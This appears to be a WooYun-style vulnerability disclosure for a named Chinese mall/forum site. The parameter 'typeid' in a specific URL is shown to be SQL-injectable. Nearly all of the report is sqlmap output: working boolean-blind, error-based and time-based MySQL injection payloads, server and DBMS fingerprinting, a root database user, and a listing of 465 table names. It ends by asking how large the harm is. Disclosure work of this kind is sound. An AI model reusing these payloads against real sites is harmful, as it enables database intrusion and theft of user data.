WooYun.org

mall.jzq001.com/plugin.php?id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831
参数 typeid
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: typeid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&type
id=1831 AND 8100=8100
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&type
id=1831 AND (SELECT 7363 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7
363=7363,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_
SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&type
id=1831 AND (SELECT * FROM (SELECT(SLEEP(5)))STcF)
---
[16:55:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
bbs_52qiuxue
[465 tables]全部搞定
+----------------------------------+
| group |
| user |
| access |
| active_active_zh |
| active_changeusername |
| active_city_website_hooks |
| active_city_website_push_log |
| active_city_website_setting |
| active_lottery_chance_zh |
| active_lottery_line_zh |
| active_lottery_zh |
| active_questionnaire |
| active_questionnaire_users |
| active_share_qq_log |
| amy_user_setting |
| appbyme_config |
| appbyme_portal_module |
| appbyme_portal_module_source |
| appbyme_user_setting |
| article |
| baidusubmit_setting |
| baidusubmit_sitemap |
| baidusubmit_urlstat |
| class |
| common_admincp_cmenu |
| common_admincp_group |
| common_admincp_member |
| common_admincp_perm |
| common_admincp_session |
| common_admingroup |
| common_adminnote |
| common_advertisement |
| common_advertisement_custom |
| common_banned |
| common_block |
| common_block_favorite |
| common_block_item |
| common_block_item_data |
| common_block_permission |
| common_block_pic |
| common_block_style |
| common_block_xml |
| common_cache |
| common_card |
| common_card_log |
| common_card_type |
| common_connect_guest |
| common_credit_log |
| common_credit_log_field |
| common_credit_rule |
| common_credit_rule_log |
| common_credit_rule_log_field |
| common_cron |
| common_devicetoken |
| common_district |
| common_diy_data |
| common_domain |
| common_failedip |
| common_failedlogin |
| common_friendlink |
| common_grouppm |
| common_invite |
| common_magic |
| common_magiclog |
| common_mailcron |
| common_mailqueue |
| common_member |
| common_member_action_log |
| common_member_connect |
| common_member_count |
| common_member_crime |
| common_member_field_forum |
| common_member_field_home |
| common_member_forum_buylog |
| common_member_grouppm |
| common_member_log |
| common_member_magic |
| common_member_medal |
| common_member_newprompt |
| common_member_profile |
| common_member_profile_bak |
| common_member_profile_setting |
| common_member_security |
| common_member_secwhite |
| common_member_stat_field |
| common_member_status |
| common_member_validate |
| common_member_verify |
| common_member_verify_info |
| common_member_wechat |
| common_member_wechatmp |
| common_myapp |
| common_myinvite |
| common_mytask |
| common_nav |
| common_onlinetime |
| common_optimizer |
| common_patch |
| common_plugin |
| common_plugin_aliyunrec |
| common_plugin_luckypacket |
| common_plugin_luckypacketlog |
| common_pluginvar |
| common_process |
| common_regip |
| common_relatedlink |
| common_remote_port |
| common_report |
| common_searchindex |
| common_seccheck |
| common_secquestion |
| common_session |
| common_setting |
| common_setting2 |
| common_setting_150805 |
| common_setting_150807 |
| common_smiley |
| common_sphinxcounter |
| common_stat |
| common_statuser |
| common_style |
| common_stylevar |
| common_syscache |
| common_tag |
| common_tagitem |
| common_task |
| common_taskvar |
| common_template |
| common_template_block |
| common_template_permission |
| common_uin_black |
| common_usergroup |
| common_usergroup_field |
| common_verifycode |
| common_visit |
| common_word |
| common_word_type |
| connect_disktask |
| connect_feedlog |
| connect_memberbindlog |
| connect_postfeedlog |
| connect_tthreadlog |
| dsu_paulsign |
| dsu_paulsignemot |
| dsu_paulsignset |
| form |
| forum_access |
| forum_activity |
| forum_activityapply |
| forum_announcement |
| forum_attachment |
| forum_attachment_0 |
| forum_attachment_1 |
| forum_attachment_2 |
| forum_attachment_3 |
| forum_attachment_4 |
| forum_attachment_5 |
| forum_attachment_6 |
| forum_attachment_7 |
| forum_attachment_8 |
| forum_attachment_9 |
| forum_attachment_exif |
| forum_attachment_unused |
| forum_attachtype |
| forum_bbcode |
| forum_collection |
| forum_collectioncomment |
| forum_collectionfollow |
| forum_collectioninvite |
| forum_collectionrelated |
| forum_collectionteamworker |
| forum_collectionthread |
| forum_creditslog |
| forum_debate |
| forum_debatepost |
| forum_faq |
| forum_filter_post |
| forum_forum |
| forum_forum_threadtable |
| forum_forumfield |
| forum_forumrecommend |
| forum_groupcreditslog |
| forum_groupfield |
| forum_groupinvite |
| forum_grouplevel |
| forum_groupuser |
| forum_hotreply_member |
| forum_hotreply_number |
| forum_imagetype |
| forum_medal |
| forum_medallog |
| forum_memberrecommend |
| forum_moderator |
| forum_modwork |
| forum_newthread |
| forum_onlinelist |
| forum_order |
| forum_pinggu |
| forum_poll |
| forum_polloption |
| forum_polloption_image |
| forum_pollvoter |
| forum_post |
| forum_post_location |
| forum_post_moderate |
| forum_post_tableid |
| forum_postcache |
| forum_postcomment |
| forum_postlog |
| forum_poststick |
| forum_promotion |
| forum_ratelog |
| forum_relatedthread |
| forum_replycredit |
| forum_rsscache |
| forum_sofa |
| forum_spacecache |
| forum_statlog |
| forum_thread |
| forum_thread_moderate |
| forum_threadaddviews |
| forum_threadcalendar |
| forum_threadclass |
| forum_threadclosed |
| forum_threaddisablepos |
| forum_threadhidelog |
| forum_threadhot |
| forum_threadimage |
| forum_threadlog |
| forum_threadmod |
| forum_threadpartake |
| forum_threadpreview |
| forum_threadprofile |
| forum_threadprofile_group |
| forum_threadrush |
| forum_threadtype |
| forum_trade |
| forum_tradecomment |
| forum_tradelog |
| forum_typeoption |
| forum_typeoptionvar |
| forum_typevar |
| forum_warning |
| group_class |
| group_class_user |
| home_access |
| home_album |
| home_album_category |
| home_appcreditlog |
| home_blacklist |
| home_blog |
| home_blog_category |
| home_blog_moderate |
| home_blogfield |
| home_class |
| home_click |
| home_clickuser |
| home_comment |
| home_comment_moderate |
| home_docomment |
| home_doing |
| home_doing_moderate |
| home_favorite |
| home_feed |
| home_feed_app |
| home_follow |
| home_follow_feed |
| home_follow_feed_archiver |
| home_friend |
| home_friend_request |
| home_friendlog |
| home_notification |
| home_pic |
| home_pic_moderate |
| home_picfield |
| home_poke |
| home_pokearchive |
| home_share |
| home_share_moderate |
| home_show |
| home_specialuser |
| home_surrounding_user |
| home_userapp |
| home_userappfield |
| home_visitor |
| lev_login_auth_user |
| lev_open_auth_user |
| lev_open_login_user |
| log |
| mall_address |
| mall_advertsion |
| mall_advertsionswf |
| mall_down_15 |
| mall_down_data_15 |
| mall_favorite |
| mall_fields |
| mall_list |
| mall_order |
| mall_relation |
| mall_shopping |
| mall_withdata |
| mobile_setting |
| mobile_wechat_authcode |
| mobile_wechat_masssend |
| mobile_wechat_resource |
| mobile_wsq_threadlist |
| moodwall |
| myrepeats |
| node |
| node_operation |
| plugin_admincp_per |
| plugin_auction |
| plugin_auction_message |
| plugin_auction_xml |
| plugin_auctionapply |
| plugin_blessing |
| plugin_formmanage_formlist |
| portal_article_content |
| portal_article_count |
| portal_article_moderate |
| portal_article_related |
| portal_article_title |
| portal_article_trash |
| portal_attachment |
| portal_category |
| portal_category_permission |
| portal_comment |
| portal_comment_moderate |
| portal_rsscache |
| portal_topic |
| portal_topic_pic |
| resource_auth_group |
| resource_auth_group_user |
| role |
| role_user |
| role_user_copy |
| security_evilpost |
| security_eviluser |
| security_failedlog |
| sms_recv |
| sms_send |
| teacher_admin_log |
| teacher_area |
| teacher_artice |
| teacher_article |
| teacher_auditiondata |
| teacher_auditionlog |
| teacher_auth_base |
| teacher_auth_class |
| teacher_auth_courses |
| teacher_auth_experience |
| teacher_auth_index |
| teacher_auth_info |
| teacher_auth_log |
| teacher_auth_success_case |
| teacher_china |
| teacher_collect |
| teacher_comment |
| teacher_commission_log |
| teacher_consumption |
| teacher_course_1 |
| teacher_course_register |
| teacher_course_time_1 |
| teacher_course_type_1 |
| teacher_courses |
| teacher_courses_copy |
| teacher_customer_call_log |
| teacher_detail |
| teacher_experience |
| teacher_fund_log |
| teacher_main |
| teacher_member_bak |
| teacher_member_profile_bak |
| teacher_message_reminder |
| teacher_need |
| teacher_need_accept |
| teacher_need_copy |
| teacher_need_log |
| teacher_need_order_detaill |
| teacher_need_status |
| teacher_order |
| teacher_orders_1 |
| teacher_parm |
| teacher_pay_log |
| teacher_points |
| teacher_proportion_rules |
| teacher_propotion_isopen |
| teacher_qrcode |
| teacher_qrcode_group |
| teacher_resources_manage |
| teacher_send_sms_log |
| teacher_sign |
| teacher_sign_log |
| teacher_student_base |
| teacher_student_class_feedback |
| teacher_student_contact |
| teacher_student_sign_feedback |
| teacher_success_case |
| teacher_teacher_base |
| teacher_teacher_comment |
| teacher_teacher_extend |
| teacher_teacher_inside_comment |
| teacher_tp_admin_log |
| teacher_tp_appointment |
| teacher_tp_appointment_copy |
| teacher_tp_area |
| teacher_tp_index |
| teacher_tp_pay_log |
| teacher_tp_type |
| teacher_tp_user_comments |
| teacher_tp_user_false_data |
| teacher_tp_user_false_parm |
| teacher_tp_user_feedback |
| teacher_umemberfields_bak |
| teacher_umembers_bak |
| teacher_user_comment |
| teacher_wechat_audition_send_log |
| teacher_wechat_send_log |
| teacher_wrong_log |
| teacher_wxvote |
| teacher_wxvote_people |
| teachers_teachers_extends |
| ucenter_admins |
| ucenter_amy_pm_heart |
| ucenter_applications |
| ucenter_badwords |
| ucenter_domains |
| ucenter_failedlogins |
| ucenter_feeds |
| ucenter_friends |
| ucenter_mailqueue |
| ucenter_memberfields |
| ucenter_members |
| ucenter_members_150813 |
| ucenter_members_copy |
| ucenter_members_copy1 |
| ucenter_mergemembers |
| ucenter_newpm |
| ucenter_notelist |
| ucenter_pm_indexes |
| ucenter_pm_lists |
| ucenter_pm_members |
| ucenter_pm_messages_0 |
| ucenter_pm_messages_1 |
| ucenter_pm_messages_2 |
| ucenter_pm_messages_3 |
| ucenter_pm_messages_4 |
| ucenter_pm_messages_5 |
| ucenter_pm_messages_6 |
| ucenter_pm_messages_7 |
| ucenter_pm_messages_8 |
| ucenter_pm_messages_9 |
| ucenter_protectedmembers |
| ucenter_settings |
| ucenter_sqlcache |
| ucenter_tags |
| ucenter_vars |
| wechat_log |
| weixin_binding |
| weixin_http_log |
| weixin_log |
| weixin_parm |
| weixin_push |
| weixin_qiye_log |
| will_log |
危害能用多大呢。